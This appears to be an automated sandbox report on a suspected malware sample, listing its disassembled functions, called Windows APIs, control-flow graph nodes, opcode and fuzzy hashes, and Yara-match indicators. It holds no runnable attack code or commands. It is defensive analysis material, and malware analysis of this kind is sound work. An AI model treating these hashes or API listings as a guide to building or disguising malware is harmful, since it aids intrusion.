                                                                            Function 015F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d6e12a73f6912f81c9589a60e3d6709ce9726f5feb832be095fca147fd4f4b6d
                                                                            • Instruction ID: b252f8dfedd922debd08ea486ac59a3ce73ff86df15f9086a9447fe8e5041d94
                                                                            • Opcode Fuzzy Hash: d6e12a73f6912f81c9589a60e3d6709ce9726f5feb832be095fca147fd4f4b6d
                                                                            • Instruction Fuzzy Hash: 9F90022170180043D145B55858186074009E7E1301F55D411E4414698DD91589965322
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 884c37ede2eb0c14199c1dbd24b20bd15e2d84e5323d9302952837d4675e91e7
                                                                            • Instruction ID: d9fd1d61eaacbfc41f64f36fa190ea3ff48f64a9ec3aff660bf59423e3da807b
                                                                            • Opcode Fuzzy Hash: 884c37ede2eb0c14199c1dbd24b20bd15e2d84e5323d9302952837d4675e91e7
                                                                            • Instruction Fuzzy Hash: 8D90022164284192554AF5584804507400AA7E0241795C412A5414A94DC5269996D721
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 182846498aab5d4d12cbaedc258204a4a3abd4b9f77dbbb1a4a7814115d21bba
                                                                            • Instruction ID: ada2767d4f18b12f9287d19d3f00685b5c97d563010e68f672c3c4eb1ecfd120
                                                                            • Opcode Fuzzy Hash: 182846498aab5d4d12cbaedc258204a4a3abd4b9f77dbbb1a4a7814115d21bba
                                                                            • Instruction Fuzzy Hash: 9D90023160180453D116B5584904707000D97D0241F95C812A442469CED6568A92A221
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7766b5e006eeb572199c2641a4422dbf4964173cb02c3fdbb726f3616ed20743
                                                                            • Instruction ID: a59c9c112ed0f2eab7d5c7bf282212d4ae8fb7794649d325126c18afe38b29e9
                                                                            • Opcode Fuzzy Hash: 7766b5e006eeb572199c2641a4422dbf4964173cb02c3fdbb726f3616ed20743
                                                                            • Instruction Fuzzy Hash: 2B90023160188842D115B558880474B000997D0301F59C811A842479CEC69589D17221
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 04a7c1e94df7be4273b1d32c49b72b227ee0e519baa9399fb31bde6419ec72c0
                                                                            • Instruction ID: f596434c60f765f7a3b491a626a92500a966a6df93ab8e1a7e5851f718aa875a
                                                                            • Opcode Fuzzy Hash: 04a7c1e94df7be4273b1d32c49b72b227ee0e519baa9399fb31bde6419ec72c0
                                                                            • Instruction Fuzzy Hash: 4B90023160180442D105B9985808647000997E0301F55D411A9024699FC66589D16231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 72ed1b6c16073dd7d69b2a7f864780041783bb2356fb3cb4ea9e1e629bf2127d
                                                                            • Instruction ID: 4a8edee682b28bfcdc18c5f0fc3b0d300b55ab7f4adca36b1ff9982423ac9bc5
                                                                            • Opcode Fuzzy Hash: 72ed1b6c16073dd7d69b2a7f864780041783bb2356fb3cb4ea9e1e629bf2127d
                                                                            • Instruction Fuzzy Hash: 6190026174180482D105B5584814B070009D7E1301F55C415E5064698EC619CD926226
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ca69af56eebe7c84009df45704db7451bcc54b5c5a137dcc2bd9f643cde2f559
                                                                            • Instruction ID: b8eeecc0146d97aa98a4de58a4eaaff274c8af4c2b6aae9dcf7e5cc87928f840
                                                                            • Opcode Fuzzy Hash: ca69af56eebe7c84009df45704db7451bcc54b5c5a137dcc2bd9f643cde2f559
                                                                            • Instruction Fuzzy Hash: F6900221611C0082D205B9684C14B07000997D0303F55C515A4154698DC91589A15621
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e17e4efc44982c8e0bc5535c6d2860e56556e3114b2bd128d64591fba1936c09
                                                                            • Instruction ID: 0793f1feb404cd33b50d30bd8b7badc297598dc7638f6ff820bf4dce1dfec169
                                                                            • Opcode Fuzzy Hash: e17e4efc44982c8e0bc5535c6d2860e56556e3114b2bd128d64591fba1936c09
                                                                            • Instruction Fuzzy Hash: DA900231601C0442D105B5584C1470B000997D0302F55C411A5164699EC62589916671
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c0f38afab8197c254d5e873e1840b54873b8fe6c4daca1a32bb96bbb9c677e9f
                                                                            • Instruction ID: 24f6ae4b669aaedfad90b5dce01dd9063e0f6a8fdfc9cf57ea7e298ced169110
                                                                            • Opcode Fuzzy Hash: c0f38afab8197c254d5e873e1840b54873b8fe6c4daca1a32bb96bbb9c677e9f
                                                                            • Instruction Fuzzy Hash: 5F900221A01800824145B5688C449074009BBE1211755C521A4998694EC55989A55765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e36ddb052724e737632c881a2106ca9ddaf3e43263494710531a629694de8fcb
                                                                            • Instruction ID: 4121fd0c93eeda1bee7b888aeb81690fd44df565e87e5d78a5951bdf5a63b472
                                                                            • Opcode Fuzzy Hash: e36ddb052724e737632c881a2106ca9ddaf3e43263494710531a629694de8fcb
                                                                            • Instruction Fuzzy Hash: 20900221A0180542D106B5584804617000E97D0241F95C422A5024699FCA258AD2A231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: fbccaf481067e17c47b2a1716d128051848cd0003ff78e3ac06aa87ec6aaee7e
                                                                            • Instruction ID: ad2968dc8a6a37996796544eed1beb06d2773b12659c9c073acc5f56ce320aa3
                                                                            • Opcode Fuzzy Hash: fbccaf481067e17c47b2a1716d128051848cd0003ff78e3ac06aa87ec6aaee7e
                                                                            • Instruction Fuzzy Hash: 4790027160180442D145B5584804747000997D0301F55C411A9064698FC6598ED56765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00979AA0 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                            • Instruction ID: ad47ee1c311e00258de21b8961f6f38cf4edbeb23579421957b98844efc06287
                                                                            • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                            • Instruction Fuzzy Hash: FE2123B3D402085BCB25E6A0AD42BFF73BCEF94304F0444ADE94D93142F634AA098BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A652 Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00979CE3,?,?,00979CE3,00000060,00000000,00000000,?,?,00979CE3,?,00000000), ref: 0098A68D
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0098A6C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitFreeHeapProcess
                                                                            • String ID:
                                                                            • API String ID: 1180424539-0
                                                                            • Opcode ID: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
                                                                            • Instruction ID: 3194cefd16aa75fac016dbbf25915d33dc00b4e3b5f4b31ad7a8cdd63b33da6f
                                                                            • Opcode Fuzzy Hash: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
                                                                            • Instruction Fuzzy Hash: B6F06DB1600204AFEB14EF64CC84EEB77A9EF88750F058659F96C5B305DA30EA108BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00978308 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 202 978308-97831f 203 978328-97835a call 98c9f0 call 97ace0 call 984e40 202->203 204 978323 call 98be50 202->204 211 97838e-978392 203->211 212 97835c-97836e PostThreadMessageW 203->212 204->203 213 978370-97838a call 97a470 212->213 214 97838d 212->214 213->214 214->211
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0097836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
                                                                            • Instruction ID: 814a92e6289b21482363d8b64083c0362c26e924de46cc30ebaf38cd1a41856b
                                                                            • Opcode Fuzzy Hash: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
                                                                            • Instruction Fuzzy Hash: AD019672A8021877EB21B6949C07FEE776CAB80F51F044158FA08BA1C2E7A5690647E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00978310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 217 978310-97835a call 98be50 call 98c9f0 call 97ace0 call 984e40 226 97838e-978392 217->226 227 97835c-97836e PostThreadMessageW 217->227 228 978370-97838a call 97a470 227->228 229 97838d 227->229 228->229 229->226
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0097836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                            • Instruction ID: d2866c5b8f4d925e42b3f6a3853711313f6a68db5a74f00abbcbd645121d6d71
                                                                            • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                            • Instruction Fuzzy Hash: 2001A772A8022877E721B6949C07FFF776C6B80F50F044154FF08BA2C2E6A4690647F6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 259 98a7b1-98a7b7 260 98a7e9-98a7f4 LookupPrivilegeValueW 259->260 261 98a7ba-98a7bd 259->261 262 98a81a-98a830 call 98af50 261->262 263 98a7bf-98a819 261->263 263->262
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0097F1C2,0097F1C2,0000003C,00000000,?,00979D55), ref: 0098A7F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
                                                                            • Instruction ID: a0a0e825f8a86ce7bedfea212b38ff57ce79962aa0137186fc22bb28a66d64ad
                                                                            • Opcode Fuzzy Hash: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
                                                                            • Instruction Fuzzy Hash: 0DE01AB6604251AFE724FBA8EC818EBB32DEF843647218857F84897305C635D92587B2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 268 98a620-98a651 call 98af50 RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00984526,?,00984C9F,00984C9F,?,00984526,?,?,?,?,?,00000000,00979CE3,?), ref: 0098A64D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction ID: 0bf7734e3aaa40cdd6cdf8f8cc6b7efd4d6aa303428a9fc21a483a848093a233
                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction Fuzzy Hash: 93E012B1200208ABDB14EF99CC41EA777ACAF88654F118559BA1C5B242C630F9108BB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 271 98a660-98a676 272 98a67c-98a6cc RtlFreeHeap call 98af50 ExitProcess 271->272 273 98a677 call 98af50 271->273 273->272
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00979CE3,?,?,00979CE3,00000060,00000000,00000000,?,?,00979CE3,?,00000000), ref: 0098A68D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction ID: a8f4f2178863feaeba54758fc87f55582658efdf7af2b32b6a3972f13e0eb506
                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction Fuzzy Hash: 42E012B1200208ABDB18EF99CC49EA777ACAF88750F018559BA1C5B242C630E9108AB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 277 98a7c0-98a7f4 call 98af50 LookupPrivilegeValueW
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0097F1C2,0097F1C2,0000003C,00000000,?,00979D55), ref: 0098A7F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction ID: 231f0dea0891bd2113a03678ab69d47139417e04a4eca9ae88cf3fdff10363f7
                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction Fuzzy Hash: BCE01AB1200208ABDB10EF49CC85EE737ADAF88650F018155BA0C57241C934E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0098A6C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction ID: 02d27c7fee74a61d0581f237b35f9617628832642e0399ed4ea6c5fe53b5f2a3
                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction Fuzzy Hash: 93D012716002147BD620EB98CC85FD7779CDF48750F018065BA1C5B241C531BA0087E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 562fd2a1b032732197b5db3c3d4c3c676c6bede5881ede20b8887e93ff702c68
                                                                            • Instruction ID: 6061486d4c6ce8fd5ab7705a82f68f67ec528a30fd10bbde28dba24627208a2f
                                                                            • Opcode Fuzzy Hash: 562fd2a1b032732197b5db3c3d4c3c676c6bede5881ede20b8887e93ff702c68
                                                                            • Instruction Fuzzy Hash: 09B09B71D019C5D5DA16E7644A0871B7904B7D0701F15C465D3030785F8738C1D1E275
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 01632349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2160512332
                                                                            • Opcode ID: 87ab31519a228090f6ff25a03d71bd569311c5c833538526eab6cb3f7cf9b32b
